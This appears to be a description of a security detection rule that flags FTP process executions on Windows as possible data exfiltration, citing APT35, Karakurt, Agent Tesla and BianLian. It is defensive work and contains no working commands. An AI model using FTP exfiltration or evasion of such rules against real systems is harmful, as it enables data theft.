This detection rule identifies potential exfiltration activities over FTP (File Transfer Protocol) on Windows systems. The rule leverages EDR (Endpoint Detection and Response) logs to monitor the execution of FTP processes that may indicate data transfers. Specifically, it looks for instances where the FTP command, with any associated parameters, is invoked. Adversaries often exploit FTP for transferring their tools and malicious payloads or for exfiltration of sensitive data. The rule captures relevant process execution information including timestamps, involved hosts, users, and associated parent processes, allowing analysts to investigate irregular file transfer activities. Threat actors associated with such behaviors include APT35 and Karakurt, and related software seen in operations include Agent Tesla and BianLian. The detection employs a regex pattern to refine the process capture, ensuring that only certain command-line executions of FTP are flagged for review.